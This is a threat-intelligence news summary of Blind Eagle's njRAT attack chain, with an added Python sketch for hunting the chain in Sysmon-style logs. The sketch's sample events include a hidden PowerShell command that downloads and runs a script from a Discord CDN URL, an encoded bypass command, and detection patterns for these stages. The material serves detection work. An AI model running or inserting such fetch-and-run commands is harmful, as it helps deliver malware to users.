The cyberespionage group Blind Eagle, also tracked as APT-C-36, has been using a new multi-stage attack chain to deploy the njRAT remote access trojan, The Hacker News reports.
According to a ThreatMon report, the chain begins with a JavaScript downloader that fetches and executes a PowerShell script hosted on Discord's CDN. That script drops a second PowerShell script and a Windows batch file, and writes a VBScript file to the Windows startup folder for persistence. When the VBScript runs at the next logon, it launches the batch file, which deobfuscates itself and runs a PowerShell script that ultimately delivers njRAT.
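The chain above leaves three observable traces a defender can hunt for: a VBScript written into the per-user Startup folder, a PowerShell command line that pulls from cdn.discordapp.com, and a parent-child chain of script hosts (wscript.exe launching powershell.exe for the JavaScript stage, wscript.exe launching cmd.exe launching powershell.exe for the persistence stage). The following is an added detection sketch, not code from ThreatMon or The Hacker News; it runs over a constructed set of Sysmon-style process-creation (event ID 1) and file-creation (event ID 11) records whose field names, PIDs, paths and URLs are all assumed for illustration.

```python
import re

# Constructed sample telemetry approximating Sysmon event IDs 1 and 11.
# PIDs, paths and the Discord attachment URL are made up for this example.
STARTUP_VBS = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.vbs"
EVENTS = [
    {"id": 1, "pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # Stage 1: JavaScript downloader run by wscript, which spawns PowerShell to fetch stage 2 from Discord's CDN.
    {"id": 1, "pid": 120, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\victim\Downloads\invoice.js"},
    {"id": 1, "pid": 150, "ppid": 120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c IEX (New-Object Net.WebClient).DownloadString("
                "'https://cdn.discordapp.com/attachments/1000/2000/stage2.ps1')"},
    # Stage 2 writes the persistence VBScript into the Startup folder.
    {"id": 11, "pid": 150, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "target": STARTUP_VBS},
    # After logon: VBScript -> batch file -> PowerShell (the njRAT delivery stage).
    {"id": 1, "pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe", "cmdline": f'wscript.exe "{STARTUP_VBS}"'},
    {"id": 1, "pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\victim\AppData\Roaming\run.bat"},
    {"id": 1, "pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # Benign noise: an admin running PowerShell from Explorer and saving a text file.
    {"id": 1, "pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"id": 11, "pid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\victim\Documents\notes.txt"},
]

# Per-user Startup folder holding a .vbs file (any user profile path).
STARTUP_VBS_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\[^\\]+\.vbs$", re.IGNORECASE)
# Payload hosted on Discord's attachment CDN, as used by the stage-1 downloader.
DISCORD_CDN_RE = re.compile(r"https?://cdn\.discordapp\.com/attachments/", re.IGNORECASE)


def process_name(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def startup_vbs_writes(events) -> list:
    """File-creation events that drop a .vbs into a Startup folder (persistence)."""
    return [e["target"] for e in events if e["id"] == 11 and STARTUP_VBS_RE.search(e["target"])]


def discord_cdn_downloads(events) -> list:
    """PIDs of processes whose command line fetches from Discord's CDN."""
    return [e["pid"] for e in events if e["id"] == 1 and DISCORD_CDN_RE.search(e["cmdline"])]


def ancestry(events, pid: int) -> list:
    """Process names from pid upward through its parents (child first); cycles and unknown parents stop the walk."""
    by_pid = {e["pid"]: e for e in events if e["id"] == 1}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(process_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def script_host_chains(events, pattern=("powershell.exe", "cmd.exe", "wscript.exe")) -> list:
    """PIDs whose ancestry starts with the given child-to-parent pattern, e.g. powershell <- cmd <- wscript."""
    hits = []
    for e in events:
        if e["id"] == 1 and tuple(ancestry(events, e["pid"])[: len(pattern)]) == pattern:
            hits.append(e["pid"])
    return hits


def report(events) -> dict:
    """Summarise all three indicators for a batch of events."""
    return {
        "startup_vbs": startup_vbs_writes(events),
        "discord_cdn_pids": discord_cdn_downloads(events),
        "js_to_powershell_pids": script_host_chains(events, ("powershell.exe", "wscript.exe")),
        "vbs_bat_powershell_pids": script_host_chains(events),
    }


if __name__ == "__main__":
    for key, value in report(EVENTS).items():
        print(f"{key}: {value}")
```

The benign PowerShell launched from Explorer (PID 500) matches none of the rules, which is the point of keying on the full parent chain rather than on powershell.exe alone; in production you would feed real Sysmon or 4688 records with the same fields and tune the Startup-folder and CDN patterns to the environment.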
"njRAT, also known as Bladabindi, is a remote access tool (RAT) with user interface or trojan which allows the holder of the program to control the end-user's computer," said ThreatMon.
Blind Eagle was earlier reported by Check Point and BlackBerry to have used spear-phishing to deliver the BitRAT and AsyncRAT malware.
Malicious GitHub pages and YouTube videos advertising purported cracked office software, automated trading bots, and game cheats have also been used to lure users into downloading self-extracting, password-protected archives.
Threat actors have also continued to impersonate employers on job-search platforms to lure software developers into fake online interviews that end in a BeaverTail malware infection; more recent attacks have deployed a new Qt-based version of BeaverTail that exfiltrates browser credentials and cryptocurrency wallet data.